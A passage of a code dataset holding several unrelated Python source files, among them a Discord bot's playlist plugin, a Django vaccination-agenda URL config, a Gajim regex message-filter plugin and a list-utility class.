guild_id=context.guild.id, volatile=True)\n await response.message.edit(content=\"Imported {} track{}.\".format(\n total_imported, '' if total_imported == 1 else 's'))\n\n\nasync def get_info(bot, context):\n \"\"\"Gets the information for the given track in the playlist.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n\n index = context.arguments[0] - 1\n if not 0 <= index < len(tracklist):\n raise CBException(\"Invalid index. Must be between 1 and {} inclusive.\".format(\n len(tracklist)), autodelete=autodelete)\n\n track_info = tracklist[index]\n title = _truncate_title(track_info.title)\n\n time_ago = time.time() - track_info.timestamp\n added_by_text = \"Added by <@{}> {} ago.\".format(\n track_info.userid, utilities.get_time_string(time_ago, text=True))\n duration_text = \"Duration: ({})\".format(utilities.get_time_string(track_info.duration))\n response = \"Info for track {}:\".format(index + 1)\n\n if use_player_interface: # Add notification\n track_link = _build_hyperlink(bot, track_info)\n info_text = \"{}\\n{}\\n{}\\n{}\".format(response, track_link, duration_text, added_by_text)\n music_player.page = int(index / 5)\n await music_player.update_interface(notification_text=info_text, ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=autodelete)\n else:\n response += \"\\n{}\\n{}\\n{}\\n{}\".format(title, track_info.url, duration_text, added_by_text)\n return Response(content=response)\n\n\nasync def set_volume(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check control restriction\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n if not is_dj and control != Control.ALL:\n raise CBException(\"You must be a DJ to change the volume.\", autodelete=autodelete)\n\n volume = context.arguments[0]\n data.add(bot, __name__, 'volume', volume, guild_id=context.guild.id)\n if use_player_interface:\n music_player.update_config()\n await music_player.update_interface(\n notification_text='<@{}> set the volume to {:.2f}%'.format(\n context.author.id, volume * 100))\n \n return Response(\n content=\"Volume set to {:.2f}%.\".format(volume * 100),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def configure_player(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(\n bot, context.guild, autodelete_time=10)\n options = context.options\n\n if use_player_interface:\n if 'switchmode' in options:\n raise CBException(\n \"Cannot switch player modes while it is active.\", autodelete=autodelete)\n elif 'channel' in options:\n raise CBException(\n \"Cannot set text channel while the player is active.\", autodelete=autodelete)\n\n guild_id = context.guild.id\n changes = []\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n is_mod = context.elevation > 0\n dj_prereq = \"You must be a DJ in order to \"\n mod_prereq = \"You must be a bot moderator in order to \"\n\n if 'threshold' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the length threshold.\")\n threshold = options['threshold']\n data.add(bot, __name__, 'threshold', threshold, guild_id=guild_id)\n changes.append('Duration threshold set to {} seconds.'.format(threshold))\n\n if 'cutoff' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the length cutoff.\")\n cutoff = options['cutoff']\n data.add(bot, __name__, 'cutoff', cutoff, guild_id=guild_id)\n changes.append('Cutoff set to {} seconds.'.format(cutoff))\n\n if 'usertracks' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the user track limit.\")\n limit = options['usertracks']\n data.add(bot, __name__, 'user_track_limit', limit, guild_id=guild_id)\n changes.append('User track limit set to {} track(s).'.format(limit))\n\n if 'totaltracks' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the total track limit.\")\n limit = options['totaltracks']\n data.add(bot, __name__, 'total_track_limit', limit, guild_id=guild_id)\n changes.append('Total track limit set to {} track(s).'.format(limit))\n\n if 'djrole' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"change the DJ role.\")\n dj_role = options['djrole']\n data.add_custom_role(bot, __name__, 'dj', dj_role)\n changes.append('Set the DJ role to {}.'.format(dj_role.mention))\n\n if 'channel' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"change the player channel.\")\n text_channel = options['channel']\n data.add(bot, __name__, 'channel', text_channel.id, guild_id=guild_id)\n changes.append('Set the text channel restriction to {}.'.format(text_channel.mention))\n\n if 'switchcontrol' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"cycle control modes.\")\n control = data.get(bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n control = 0 if control == len(Control) - 1 else control + 1\n data.add(bot, __name__, 'control', control, guild_id=guild_id)\n changes.append('Cycled the playlist permissions control mode to: {}'.format(\n ('Public', 'Partially public', 'DJs only')[control]))\n\n if 'switchmode' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"cycle player modes.\")\n mode = data.get(bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n mode = 0 if mode == len(Modes) - 1 else mode + 1\n data.add(bot, __name__, 'mode', mode, guild_id=guild_id)\n changes.append('Cycled the playlist mode to: {}'.format(('Playlist', 'Queue')[mode]))\n\n if 'mirrorchat' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"toggle chat mirroring.\")\n mirror = not data.get(bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n data.add(bot, __name__, 'mirror_chat', mirror, guild_id=guild_id)\n changes.append('{}abled chat mirroring.'.format('En' if mirror else 'Dis'))\n\n if 'autodisconnect' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"toggle automatic disconnecting.\")\n auto_disconnect = not data.get(\n bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n data.add(bot, __name__, 'auto_disconnect', auto_disconnect, guild_id=guild_id)\n changes.append('{}abled auto disconnecting.'.format('En' if auto_disconnect else 'Dis'))\n\n # Defaults\n default_threshold = configurations.get(bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n default_total_track_limit = configurations.get(bot, __name__, key='max_total_track_limit')\n default_user_track_limit = configurations.get(bot, __name__, key='max_user_track_limit')\n\n # Format and display all settings\n threshold = data.get(bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n cutoff = data.get(bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n total_track_limit = data.get(\n bot, __name__, key='total_track_limit',\n guild_id=guild_id, default=default_total_track_limit)\n user_track_limit = data.get(\n bot, __name__, key='user_track_limit',\n guild_id=guild_id, default=default_user_track_limit)\n dj_role = data.get_custom_role(bot, __name__, 'dj', context.guild)\n control = data.get(bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n mode = data.get(bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n chat_mirroring = data.get(bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n auto_disconnect = data.get(bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n text_channel_id = data.get(bot, __name__, 'channel', guild_id=guild_id)\n text_channel = context.guild.get_channel(text_channel_id)\n\n embed = discord.Embed(\n title='Player configuration', description=(\n 'Text channel: {}\\nTotal track limit: {}\\n'\n 'User track limit: {}\\nThreshold: {}\\nCutoff: {}\\n'\n 'DJ Role: {}\\nControl: {}\\nPlayer mode: {}\\n'\n 'Chat mirroring: {}\\nAutomatic disconnecting: {}'.format(\n text_channel.mention if text_channel else 'None',\n '{} tracks'.format(total_track_limit),\n '{} tracks'.format(user_track_limit),\n '{} seconds'.format(threshold),\n '{} seconds'.format(cutoff),\n dj_role.mention if dj_role else 'None',\n ('Public', 'Partially public', 'DJs only')[control],\n ('Repeating playlist', 'Single play queue')[mode],\n chat_mirroring,\n auto_disconnect)\n )\n )\n\n if changes:\n embed.add_field(name=\"Changes\", value='\\n'.join(changes))\n if use_player_interface:\n music_player.update_config()\n await music_player.update_interface('{}:\\n{}'.format(\n context.author.mention, '\\n'.join(changes)))\n\n return Response(\n embed=embed,\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def clear_playlist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n raise CBException(\n \"Cannot clear playlist tracks when the player is active.\", autodelete=autodelete)\n \n return Response(\n content=\"Say 'yes' to confirm clearning the playlist.\",\n message_type=MessageTypes.WAIT,\n extra_function=_confirm_clear_playlist,\n extra={\n 'event': 'message',\n 'kwargs': {\n 'timeout': 30, # Default 300\n 'check': lambda m: m.author == context.author,\n }\n }\n )\n\n\nasync def _confirm_clear_playlist(bot, context, response, result):\n \"\"\"Menu for confirming a playlist clear.\"\"\"\n if result is None: # Timed out\n edit = 'Playlist clear timed out.'\n\n elif result.content.lower() == 'yes':\n # music_player = _get_music_player(bot, context.guild)\n _, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n raise CBException(\n \"Cannot clear playlist tracks when the player is active.\", autodelete=autodelete)\n data.db_drop_table(bot, 'playlist', table_suffix=context.guild.id, safe=True)\n edit = 'Playlist has been cleared.'\n\n else:\n edit = 'Playlist clear cancelled.'\n\n await response.message.edit(content=edit)\n\n\nasync def skip_to_page(bot, context):\n \"\"\"Skips to a certain page of the tracklist in the player interface.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if not use_player_interface:\n raise CBException(\"The player interface must be active.\")\n\n # Check page number\n tracklist = music_player.tracklist\n page_number = context.arguments[0] - 1\n total_pages = max(int((len(tracklist) + 4) / 5), 1)\n if not 0 <= page_number <= total_pages - 1:\n raise CBException(\n \"Invalid page number. Must be between 1 and {} inclusive.\".format(total_pages),\n autodelete=autodelete)\n\n music_player.page = page_number\n await music_player.update_interface(ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=1)\n\n\nasync def swap_tracks(bot, context):\n \"\"\"Swaps the given two tracks in the playlist.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check control restriction\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n if not is_dj and control != Control.ALL:\n raise CBException(\"You must be a DJ to swap tracks.\", autodelete=autodelete)\n \n # Check index validity\n tracklist = _get_tracklist(bot, context.guild)\n swap = []\n for index in context.arguments:\n if not 1 <= index <= len(tracklist):\n raise CBException(\n \"Index must be between 1 and {}\".format(len(tracklist)),\n autodelete=autodelete)\n swap.append(tracklist[index - 1])\n\n # Swap tracks\n set_arg = (\n '(url, downloadurl, title, duration, userid, timestamp, extra) = '\n '(%s, %s, %s, %s, %s, %s, %s)')\n for index, track in enumerate(swap):\n data.db_update(\n bot, 'playlist', table_suffix=context.guild.id,\n set_arg=set_arg, where_arg='id=%s', input_args=[\n track.url, track.downloadurl, track.title, track.duration, track.userid,\n track.timestamp, Json(track.extra), swap[index - 1].id])\n\n # Add notification and skip track if necessary\n response = '{} swapped tracks {} and {}'.format(context.author.mention, *context.arguments)\n if use_player_interface:\n music_player.update_tracklist()\n if music_player.track_index + 1 in context.arguments:\n asyncio.ensure_future(music_player.play(track_index=music_player.track_index))\n await music_player.update_interface(notification_text=response, ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=autodelete)\n else:\n return Response(content=response)\n\n\nasync def _check_player_restrictions(\n bot, context, music_player, use_player_interface, autodelete):\n \"\"\"Ensures that the user in the context can interact with the player.\"\"\"\n\n # Channel restriction checks\n channel_restriction_id = data.get(bot, __name__, 'channel', guild_id=context.guild.id)\n if channel_restriction_id not in [it.id for it in context.guild.channels]:\n raise CBException(\n \"The music player does not have an assigned text channel. Please see \"\n \"`{}help playlist configure` for more information.\".format(\n utilities.get_invoker(bot, guild=context.guild)))\n if channel_restriction_id != context.channel.id:\n channel_restriction = data.get_channel(bot, channel_restriction_id, guild=context.guild)\n raise CBException(\n \"The music player must be used in the assigned text channel, {}.\".format(\n channel_restriction.mention))\n\n # Voice channel checks\n if not context.author.voice:\n raise CBException(\n \"You must be in a voice channel to use the player.\", autodelete=autodelete)\n voice_channel = context.author.voice.channel\n if use_player_interface and music_player.voice_channel != voice_channel:\n raise CBException(\n \"You must be in the same voice channel as the bot.\", autodelete=autodelete)\n elif use_player_interface and music_player.state == States.LOADING:\n raise CBException(\"Playlist is loading, please wait.\", autodelete=autodelete)\n\n\nasync def control_player(bot, context):\n \"\"\"Basic control of the player (like pausing/stopping/skipping etc.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n if len(context.options) != 2:\n raise CBException(\"Only one action must be provided.\", autodelete=autodelete)\n if not use_player_interface:\n raise CBException(\"The music player is not active.\")\n await _check_player_restrictions(bot, context, music_player, use_player_interface, autodelete)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n permissions = music_player.control == Control.ALL or is_dj\n\n try:\n action = \"[Unknown]\"\n if 'next' in context.options or 'skip' in context.options:\n action = 'skip the current track'\n assert permissions or music_player.control == Control.PARTIAL\n result = await music_player.track_navigate(True, context.author)\n if not result: # Add to vote skip list instead\n if (music_player.state == States.PLAYING and\n context.author.id not in music_player.skip_voters):\n action += '. Voting to skip instead'\n music_player.skip_voters.append(context.author.id)\n music_player.update_listeners()\n assert False\n elif 'resume' in context.options:\n action = 'resume the player'\n assert permissions or music_player.autopaused or music_player.first_time_startup\n asyncio.ensure_future(music_player.play(author=context.author))\n else:\n if 'pause' in context.options:\n action = 'pause the player'\n assert permissions\n asyncio.ensure_future(music_player.pause(author=context.author))\n elif 'stop' in context.options:\n action = 'stop the player'\n assert permissions\n asyncio.ensure_future(music_player.stop(\n text=\"The player has been stopped by {}.\".format(context.author.mention)))\n elif 'previous' in context.options:\n action = 'skip to the previous track'\n assert permissions\n asyncio.ensure_future(music_player.track_navigate(False, context.author))\n except AssertionError:\n raise CBException(\n \"You have insufficient permissions to {}.\".format(action),\n autodelete=autodelete)\n\n # Delete message\n return Response(message_type=MessageTypes.REPLACE, extra=1)\n\n\nasync def setup_player(bot, context):\n \"\"\"Starts the player interface and starts playing a track if selected.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n await _check_player_restrictions(bot, context, music_player, use_player_interface, autodelete)\n\n use_play_command = context.subcommand.id == 'play'\n if use_play_command and (context.arguments[0] and 'track' in context.options):\n raise CBException(\n \"Cannot supply the track and query paramters at the same time.\",\n autodelete=autodelete)\n\n # Check given track index if given\n # Get mode from persistent data because the player may not exist yet\n track_index = None\n track = None\n adding_track = False\n if use_play_command:\n if 'track' in context.options: # Play track index\n track_index = context.options['track']\n tracklist = _get_tracklist(bot, context.guild)\n if not 0 < track_index <= len(tracklist):\n raise CBException(\n \"Track index must be between 1 and {} inclusive.\".format(len(tracklist)),\n autodelete=autodelete)\n track_index -= 1\n track = tracklist[track_index]\n elif context.arguments[0]: # Query given (add track)\n adding_track = True\n add_track_response = await add_track(bot, context)\n await bot.handle_response(context.message, add_track_response, context=context)\n await _check_player_restrictions(\n bot, context, music_player, use_player_interface, autodelete\n )\n\n # Check autoplay permissions\n use_autoplay = False\n if use_play_command:\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control_type = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n use_autoplay = (\n control_type == Control.ALL or is_dj or\n (control_type == Control.PARTIAL and\n (not music_player or music_player.first_time_startup)))\n\n # Setup new player\n if music_player is None or music_player.state == States.STOPPED:\n logger.debug(\"Creating new music player.\")\n music_player = MusicPlayer(\n bot, context.message, autoplay=use_autoplay, track_index=track_index)\n data.add(\n bot, __name__, 'music_player', music_player, guild_id=context.guild.id, volatile=True)\n\n # Update player message or change tracks\n else:\n if use_autoplay and track_index is not None:\n music_player.notification = '{} skipped to {}'.format(\n context.author.mention, _build_track_details(bot, track, track_index))\n\n play_track = bool(\n use_autoplay and (music_player.state == States.PAUSED or track_index is not None))\n\n # Check if messages can just be replaced\n message_history = await context.channel.history(limit=3).flatten()\n message_ids = list(it.id for it in message_history)\n if (len(message_history) > 2 and music_player.message.id in message_ids and\n not context.subcommand.id == 'show'):\n if play_track:\n asyncio.ensure_future(music_player.play(\n track_index=track_index, author=context.author))\n\n else:\n await music_player.set_new_message(\n context.message, autoplay=use_autoplay if play_track else None,\n track_index=track_index)\n\n # Delete any immediate play/skip commands, but keep track add messages.\n if not adding_track:\n return Response(message_type=MessageTypes.REPLACE)\n","repo_name":"jkchen2/JshBot-plugins","sub_path":"playlist/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":100715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31971153432","text":"from django.urls import path, include\nfrom agenda import views\n\napp_name = 'agenda'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('autocadastro/', views.autocadastro, name='autocadastro'),\n path('minhas_vacinas/', views.minhas_vacinas, name='minhas_vacinas'),\n path(r'campanhas/', include([\n path('', views.campanhas, name='campanhas'),\n path('', views.detalhar_campanha, name='detalhar_campanha'),\n path('/editar/', views.editar_campanha, name='editar_campanha'),\n path('cadastrar/', views.cadastrar_campanha, name='cadastrar_campanha'),\n ])),\n path(r'agendar_vacinacao/', include([\n path('/', views.agendar_vacinacao_estabelecimento, name='agendar_vacinacao_estabelecimento'),\n path('//', views.agendar_vacinacao_data, name='agendar_vacinacao_data'),\n ])),\n \n path(r'acompanhar_vacinacao/', include([\n path('/fila/', views.fila, name='fila'),\n ])),\n \n path('/confirmar_vacinacao/', views.confirmar_vacinacao, name='confirmar_vacinacao'),\n path('cadastrar_vacina_privada/', views.cadastrar_vacina_privada, name='cadastrar_vacina_privada')\n\n]\n","repo_name":"Trunkol/imunizow","sub_path":"agenda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74995098616","text":"import re\n\nfrom plugins import GajimPlugin\nfrom plugins.helpers import log, log_calls\n\nfrom common import gajim\nfrom common import ged\nfrom command_system.framework import CommandContainer, command, doc\nfrom command_system.implementation.hosts import *\n\nclass RegexFilterPlugin(GajimPlugin):\n\n @log_calls('RegexFilterPlugin')\n def init(self):\n self.config_dialog = None\n\n self.events_handlers = {\n 'decrypted-message-received': (ged.PREGUI1,\n self._nec_decrypted_message_received),\n 'gc-message-received': (ged.PREGUI1, self._nec_gc_message_received),\n }\n\n self.create_rules()\n\n @log_calls('RegexFilterPlugin')\n def activate(self):\n FilterCommands.enable()\n\n @log_calls('RegexFilterPlugin')\n def deactivate(self):\n FilterCommands.disable()\n\n @log_calls('RegexFilterPlugin')\n def create_rules(self):\n self.rules = {}\n for num, c in self.config.items():\n self.rules[int(num)] = [re.compile(c[0], re.MULTILINE), c[1]]\n\n @log_calls('RegexFilterPlugin')\n def add_rule(self, search, replace):\n if self.rules:\n num = max(self.rules.keys()) + 1\n else:\n num = 0\n self.config[str(num)] = [search, replace]\n self.create_rules()\n\n @log_calls('RegexFilterPlugin')\n def remove_rule(self, num):\n if num in self.config:\n del self.config[num]\n self.create_rules()\n return True\n return False\n\n @log_calls('RegexFilterPlugin')\n def get_rules(self):\n return self.config\n\n @log_calls('RegexFilterPlugin')\n def _nec_all(self, obj):\n if not obj.msgtxt:\n return\n rules_num = self.rules.keys()\n rules_num.sort()\n for num in rules_num:\n rule = self.rules[num]\n obj.msgtxt = rule[0].sub(rule[1], obj.msgtxt)\n\n @log_calls('RegexFilterPlugin')\n def _nec_decrypted_message_received(self, obj):\n self._nec_all(obj)\n\n @log_calls('RegexFilterPlugin')\n def _nec_gc_message_received(self, obj):\n self._nec_all(obj)\n\nclass FilterCommands(CommandContainer):\n AUTOMATIC = False\n HOSTS = ChatCommands, PrivateChatCommands, GroupChatCommands\n\n @command(\"add_filter\", raw=True)\n @doc(_(\"Add an incoming filter. First argument is the search regex, \"\n \"second argument is the replace regex.\"))\n def add_filter(self, search, replace):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n plugin.add_rule(search, replace)\n return _('Added rule to replace %s by %s' % (search, replace))\n\n @command(\"remove_filter\", raw=True)\n @doc(_(\"Remove an incoming filter. Argument is the rule number. \"\n \"See /list_rules command.\"))\n def remove_filter(self, num):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n if plugin.remove_rule(num):\n return _('Rule number %s removed' % num)\n return _('Rule number %s does not exist' % num)\n\n @command(\"list_filters\")\n @doc(_(\"List incoming filters.\"))\n def list_filters(self):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n rules = plugin.get_rules()\n st = ''\n for num, rule in rules.items():\n st += _('%(num)s: %(search)s -> %(replace)s') % {'num': num,\n 'search': rule[0], 'replace': rule[1]} + '\\n'\n if st:\n return st[:-1]\n else:\n return _('No rule defined')\n","repo_name":"lheckemann/gajim-plugins","sub_path":"regex_filter/regex_filter.py","file_name":"regex_filter.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5369624986","text":"import os\n\ndef Creation(Company, Reset):\n for comp in Company:\n if ((os.path.isfile(comp+\"_Bench\")==False) or Reset):\n f = open(comp+\"_Bench\",\"w+\")\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Total Change\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Bench Date\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Current Date\n f.close()\n\n if ((os.path.isfile(comp+\"_Trend\")==False) or Reset):\n f = open(comp+\"_Trend\",\"w+\")\n\n return 0\n","repo_name":"Jokezor/TheTrendingGroup","sub_path":"Scripts/Create_files.py","file_name":"Create_files.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"28548526644","text":"class Utility:\n\tdef pos_none_in_list(self, l):\n\t\t\n\t\t\"\"\"take a list of values and return the position number of the values\n\t\tequal to 'None' \"\"\"\n\t\tself.list = l\n\t\tl2=[]\n\t\tfor i in range(len(self.list)):\n\t\t\tif self.list[i] == 'None':\n\t\t\t\tl2.append(i)\n\t\tfor i in l2:\n\t\t\tself.list[i] = None\n\n\t\treturn self.list\n\t\n\tdef tup_2_list(self, t, s='', i=0):\n\t\t\n\t\t\"\"\"take a tuple of strings, and return a list of lists of the values.\n\t\tif s is set, add the value to the strings. If i is set return only the\n\t\tvalue in the i position\"\"\"\n\t\tself.tupla = t\n\t\tself.index = i\n\t\tself.subfix = s\n\t\tl = []\n\t\tfor n in range(len(self.tupla)):\n\t\t\ttry:\n\t\t\t\tint(self.tupla[n][self.index])\n\t\t\texcept ValueError:\n\t\t\t\tv = [self.subfix + self.tupla[n][self.index]] \n\t\t\telse:\n\t\t\t\tv = [self.subfix + str(self.tupla[n][self.index])] \n\t\t\tl.append(v)\n\t\treturn l\n\t\n\tdef tup_2_list_II(self, l):\n\t\t\"\"\"take a list of tuples ad return a list of lists\"\"\"\n\t\tself.list = l\n\t\tl = []\n\t\tfor i in self.list:\n\t\t\tsublist=[]\n\t\t\tfor n in i:\n\t\t\t\tsublist.append(n)\n\t\t\tl.append(sublist)\n\t\treturn l\n\n\tdef tup_2_list_III(self, l):\n\t\t\"\"\"take a list of tuples ad return a list of values\"\"\"\n\t\tself.list = l\n\t\tnl = []\n\t\tfor i in self.list:\n\t\t nl.append(i[0])\n\t\treturn nl\n\n\tdef list_tup_2_list(self, l):\n\t\t\"\"\"take a list of tuples ad return a list of lists\"\"\"\n\t\tself.list = l\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tres_list.append(i[0])\n\t\treturn res_list\n\n\tdef select_in_list(self,l,p):\n\t\t\"\"\"take a list of lists or value and return the in a list of lists\n\t\tthe value taken by the value of p. \"\"\"\n\t\tself.list = l\n\t\tself.pos = p\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tif type(i) is list:\n\t\t\t\tpar_tup = i\n\t\t\t\tres_list.append([par_tup[self.pos]])\n\t\t\telse:\n\t\t\t\tres_list.append([self.list[self.pos]])\n\t\t\t\t\n\t\t\t\tbreak\n\t\treturn res_list\n\n\n\tdef count_list_eq_v(self, l, v):\n\t\t\"\"\"take a list and a value. If the number of occurens of a\n\t\titems inside the list is equal to v value, put the singol value \n\t\tinto list_res as a list. Return a list of lists\"\"\"\n\n\t\tself.list = l\n\t\tself.value = v\n\t\tlist_res = []\n\t\tfor i in self.list:\n\t\t\tif self.list.count(i) == self.value:\n\t\t\t\tlist_res.append([i])\n\t\treturn list_res\n \n\t\n\tdef find_list_in_dict(self, d):\n\t\t\"\"\"recives a dict and if contains a list of lists and\n\t\tdelete the item from the dict.\n\t\tReturn a tuple containin the new dict and a list of\n\t\ttuples wich contain the keys and the values\"\"\"\n\n\t\tself.dict = d\n\t\t##print \"self.dict\", self.dict\n\t\tres_list = []\n\t\tret= []\n\t\tfor key,value in self.dict.items():\n\t\t\tif bool(value) == True:\n\t\t\t\tif type(value[0]) is list:\n\t\t\t\t\tres_list.append((key,value))\n\t\t\t\t\tdel self.dict[key]\n\n\t\tif bool(res_list) == True:\n\t\t\tfor i in res_list:\n\t\t\t\tcont = 0\n\t\t\t\tfor n in range(len(i)):\n\t\t\t\t\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\tret.append((i[0]+str(cont), i[1][cont]))\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\tcont +=1\n\t\treturn self.dict, ret\n\n\tdef add_item_to_dict(self,d,i):\n\t\t\"\"\"receive a dict and a list containt tuple with key,value\n\t\tand add them to dict\"\"\"\n\t\t\n\t\tself.dict = d\n\t\tself.item = i\n\t\tfor i in self.item:\n\t\t\tself.dict[i[0]] = i[1]\n\t\treturn self.dict\n\n\tdef list_col_index_value(self,v1,v2):\n\t\t\"\"\"return two lists into one tupla,\n\t\ttakin' two list with same lenght and lookin for the occurrences.\n\t\tfor every occurrences between v_1 and v_2 the v_2 value it's charged\n\t\tinto mod_value and its position in list it's put into list_index.\n\t\t\"\"\"\n\t\tself.v_1=v1\n\t\tself.v_2=v2\n\t\tlist_index = []\n\t\tmod_value = []\n\t\tfor i in range(len(self.v_1)):\n\t\t\tif self.v_1[i] != self.v_2[i]:\n\t\t\t\tmod_value.append(self.v_2[i])\n\t\t\t\tlist_index.append(str(i))\n\t\treturn mod_value, list_index\n\n\tdef deunicode_list(self, l):\n\t\tself.list = l\n\t\tfor i in range(len(self.list)):\n\t\t\tif str(type(self.list[i])) != \"\":\n\t\t\t\tif self.list[i] == None:\n\t\t\t\t\tpass\n\t\t\t\telif self.list[i][0:3] == '\"\"\"':\n\t\t\t\t\tself.list[i] = self.list[i][3:-3]\n\t\t\t\telif self.list[i][0:1] == '\"':\n\t\t\t\t\tself.list[i] = self.list[i][1:-1]\n\t\treturn self.list\n\n\n\tdef zip_lists(self,l1,l2):\n\t\tself.l1 = l1\n\t\tself.l2 = l2\n\t\t\n\t\teq_list=zip(l1,l2)\n\t\tlr=[]\n\t\tfor i in eq_list:\n\t\t\tif i[0]==i[1]:\n\t\t\t\tlr.append(i[0])\n\t\t\t\t\n\t\tif bool(lr)==True:\n\t\t\treturn lr\n\n\tdef join_list_if(self,l1,l2,v1,v2):\n\t\tself.l1 = l1\n\t\tself.l2 = l2\n\t\tself.value_pos_1=v1\n\t\tself.value_pos_2=v2\n\t\tr_list=[]\n\t\tfor l1\tin self.l1:\n\t\t\tsublist=[]\n\t\t\tfor l2 in self.l2:\n\t\t\t\tif str(type(l1[self.value_pos_1])) != \"\":\n\t\t\t\t\tif l1[self.value_pos_1]==l2[self.value_pos_2]:\n\t\t\t\t\t\tsublist+=l2[self.value_pos_2+1:]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif l1[self.value_pos_1].strip()==l2[self.value_pos_2]:\n\t\t\t\t\t\t\tsublist+=l2[self.value_pos_2+1:]\n\t\t\t\t\t\t\n\t\t\tif bool(sublist) == True:\n\t\t\t\tr_list.append(l1+sublist)\n\t\t\t\t\t\n\t\tif bool(r_list) == True:\n\t\t\treturn r_list\n\n\tdef extract_from_list(self, l, p):\n\t\tself.list = l\n\t\tself.pos = p\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tres_list.append([i[self.pos]])\n\t\treturn res_list\n\n\tdef remove_empty_items_fr_dict(self,d):\n\t\tfor k,v in d.items():\n\t\t\tif v == \"\" or v == '' or v == \"''\" or v == '\"\"' or v == None:\n\t\t\t\td.pop(k)\n\t\treturn d\n\n\tdef findFieldFrDict(self, d, fn):\n\t\tself.dict = d\n\t\tself.field_name = fn\n\t\tfor i in self.dict:\n\t\t\tif self.dict[i] == self.field_name:\n\t\t\t\tres = i\n\t\t\telse:\n\t\t\t\tres = None\n\t\treturn res\n\n\n\n#print dir(Utility())\n#Samples - uncomment and run the module to view the functions\n#u = Utility()\n#print u.findFieldFrDict((2))\n#print \"----------tup_to_list--------------\"\n#print \"\"\n#print u.tup_2_list((\"a\", \"b\", \"c\"))\n###print \"\"\n#print u.tup_2_list((\"a\", \"b\", \"c\"), \"lettera: \")\n###print \"\"\n# u.tup_2_list( ((\"a\", \"b\"), (\"c\", \"d\")), \"\", 1)\n###print \"\"\n###print \"----------\n###print \"\"\n###print \"----------tup_to_list_II--------------\"\n###print \"\"\n#print u.list_tup_2_list([(1, ), (2, ), (\"dssa\", )])\n##print u.tup_2_list_II([[\"a\", \"b\", \"c\"]])\n###print \"\"\n###print \"\"\n###print \"----------\n###print u.select_in_list([12, 5, 7, 3, 3], 1)\n###print 